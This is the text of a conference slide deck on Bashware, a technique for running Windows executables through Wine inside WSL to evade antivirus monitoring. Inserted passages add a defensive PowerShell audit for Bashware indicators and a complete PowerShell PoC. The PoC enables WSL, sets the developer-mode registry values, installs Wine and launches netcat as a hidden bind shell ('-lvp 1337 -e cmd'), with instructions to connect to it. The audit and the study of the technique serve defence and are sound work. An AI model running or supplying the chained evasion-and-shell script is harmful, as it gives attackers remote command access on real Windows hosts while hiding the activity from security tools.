Executing Windows Malware through WSL (Bashware)
A quick talk on executing Windows binaries using Wine in WSL. This allows for a sort of hidden process execution.


Bashware
A malware execution technique

/usr/bin/who
• null and OWASP Bangalore chapter leader
• A decade of security experience in various technologies
• Security researcher and evangelist
• Speaker and trainer at several security conferences
• https://ibreak.software
• @riyazwalikar | @wincmdfu

What is Bashware?
• A technique published by Check Point Research that malware can use to run through the Windows Subsystem for Linux (WSL) and avoid detection by security solutions (AV etc.) that do not monitor WSL processes
• Basically a way to run PE executables through WSL (via Wine)
• Bash + (mal)ware

Back to Basics
• How does malware (pick any) infect a Windows machine?
• How is it detected? Any examples of detection techniques?

An overview of WSL
• WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of:
• A user mode session manager service that handles the Linux instance life cycle
• Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls
• Pico processes that host the unmodified user mode Linux binaries (e.g. /bin/bash)
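The components listed above are also what a defender can inventory on a host. The following PowerShell audit is an added example, not part of the deck or of Check Point's research: it reports the WSL feature state, the pico provider drivers, the developer-mode unlock values, any legacy (lxrun-installed) Linux root filesystem, and running processes that look like WSL1 pico processes. It assumes the legacy WSL layout of that era (rootfs under %LOCALAPPDATA%\lxss) and uses one heuristic that is an assumption: under WSL1 a Linux process appears in the NT process list under its Linux name but with no readable image path, whereas the real bash.exe launcher has one. Run it from an elevated PowerShell; it is read-only.

```powershell
# Added audit example (not from the slides). Read-only; run elevated on Windows 10.
# Assumption: legacy lxrun-based WSL layout, rootfs under <user>\AppData\Local\lxss.
function Get-BashwareIndicators {
    $result = [ordered]@{}

    # 1. Is the WSL optional feature enabled?
    $feat = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux -ErrorAction SilentlyContinue
    $result.WslFeatureState = if ($feat) { [string]$feat.State } else { 'NotPresent' }

    # 2. Pico provider drivers on disk, and whether the lxss driver service is running
    $drv = Join-Path $env:SystemRoot 'System32\drivers'
    $result.PicoDriversOnDisk = @('lxss.sys', 'lxcore.sys') | Where-Object { Test-Path (Join-Path $drv $_) }
    $svc = Get-CimInstance Win32_SystemDriver -Filter "Name='lxss'" -ErrorAction SilentlyContinue
    $result.LxssDriverState = if ($svc) { $svc.State } else { 'NotInstalled' }

    # 3. Developer-mode unlock values (the PoC sets both to 1); missing key reads as 0
    $unlock = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock' -ErrorAction SilentlyContinue
    $result.AllowAllTrustedApps = [int]($unlock.AllowAllTrustedApps)
    $result.AllowDevelopmentWithoutDevLicense = [int]($unlock.AllowDevelopmentWithoutDevLicense)

    # 4. Legacy Linux rootfs installed for any local user
    $result.LxssRootfs = Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Local\lxss\rootfs' } |
        Where-Object { Test-Path $_ }

    # 5. Running processes that look like WSL1 pico processes of interest (assumed heuristic:
    #    Linux-named process with no readable NT image path; the NT bash.exe launcher has a Path)
    $result.SuspectProcesses = Get-Process |
        Where-Object { $_.ProcessName -match '^(init|bash|wine(64|server|64-preloader)?)$' -and -not $_.Path } |
        Select-Object Id, ProcessName

    [pscustomobject]$result
}

Get-BashwareIndicators | Format-List
```

A host where the feature is enabled, both unlock values are 1, a rootfs exists and a pathless `wine64` or `wineserver` process is running has every prerequisite the PoC on the following slides needs; none of these signals is proof of malice on its own, so treat them as hunting leads rather than alerts.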
Demo of WSL

Bashware Video Demo
• https://www.youtube.com/watch?v=fwEQFMbHIV8

Let’s build a PoC!

According to the video/blogpost
• Enable WSL
• Enable Developer mode
• Install Linux components
• Install WineHQ
• Run Windows binary through Wine

Step 1: Enable WSL
dism /Online /Enable-Feature /All /FeatureName:Microsoft-Windows-Subsystem-Linux /NoRestart
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

Step 2: Enable Developer mode
• Set the following registry values
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock]
"AllowAllTrustedApps"=dword:00000001
"AllowDevelopmentWithoutDevLicense"=dword:00000001

Step 3: Install Linux components
• lxrun /install /y

Step 4: Install Wine
dpkg --add-architecture i386
add-apt-repository -y ppa:ubuntu-wine/ppa
apt-get update
apt-get install -y wine1.6-amd64

Step 5: Run PE binary using wine
wine64 nc64.exe -lvp 1337 -e cmd
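The five steps above chained into one script, as an added example that is not the deck's own PoC. It assumes Windows 10 of the same era as the slides, where WSL is installed with the legacy lxrun.exe (removed from later builds in favour of Store distributions), an Administrator shell, a reboot after the feature is first enabled, and a hypothetical staging directory C:\Temp holding nc64.exe; the listener port 1337 and the `-e cmd` argument are the ones on the slide. The Wine installation script is written with LF line endings to a path WSL sees under /mnt/c, because a CRLF script fails inside bash.

```powershell
#Requires -RunAsAdministrator
# Bashware PoC driver (added example, not the slide deck's script).
# Assumed: legacy lxrun-based WSL, C:\Temp\nc64.exe already present, port 1337 as on the slide.
$ErrorActionPreference = 'Stop'
$staging = 'C:\Temp'                       # hypothetical staging directory
$ncPath  = Join-Path $staging 'nc64.exe'   # the PE binary to run under Wine
if (-not (Test-Path $ncPath)) { throw "Expected $ncPath to exist" }

# Step 1: enable the WSL optional feature. On first enable a reboot is required before lxrun/bash work.
$feat = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
if ($feat.State -ne 'Enabled') {
    Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux -NoRestart | Out-Null
    Write-Warning 'WSL feature enabled; reboot and re-run this script.'
    return
}

# Step 2: developer mode, the same two DWORDs the slide sets from a .reg file
$unlock = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock'
if (-not (Test-Path $unlock)) { New-Item -Path $unlock -Force | Out-Null }
Set-ItemProperty -Path $unlock -Name AllowAllTrustedApps -Type DWord -Value 1
Set-ItemProperty -Path $unlock -Name AllowDevelopmentWithoutDevLicense -Type DWord -Value 1

# Step 3: install the Ubuntu userland non-interactively with the legacy installer (skip if present)
if (-not (Test-Path (Join-Path $env:LOCALAPPDATA 'lxss\rootfs'))) {
    & (Join-Path $env:SystemRoot 'System32\lxrun.exe') /install /y
}

# Step 4: install Wine inside WSL. Script saved with LF endings, UTF-8 without BOM.
$wineScript = @'
set -e
dpkg --add-architecture i386
add-apt-repository -y ppa:ubuntu-wine/ppa
apt-get update
apt-get install -y wine1.6-amd64
'@
$wineScript = $wineScript -replace "`r`n", "`n"
$scriptPath = Join-Path $staging 'install-wine.sh'
[IO.File]::WriteAllText($scriptPath, $wineScript, [Text.UTF8Encoding]::new($false))
$bash = Join-Path $env:SystemRoot 'System32\bash.exe'
& $bash -c 'sudo bash /mnt/c/Temp/install-wine.sh'

# Step 5: run the Windows PE through wine64 inside WSL, exactly as on the slide.
# The listener runs inside a pico process; nc64.exe never starts as a normal NT process.
& $bash -c 'wine64 /mnt/c/Temp/nc64.exe -lvp 1337 -e cmd'
```

Connect from another host with `nc <target> 1337` to confirm the shell; then, if the audit from the WSL overview slide is available, run it while the listener is up to see which of the indicators this leaves behind.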
Demo

• Riyaz Walikar
• https://ibreak.software
• @riyazwalikar | @wincmdfu

References
• https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/
• https://www.youtube.com/watch?v=fwEQFMbHIV8
• https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows-subsystem-for-linux-overview/
• https://ibreak.software/executing-windows-malware-in-windows-subsystem-for-linux-bashware/
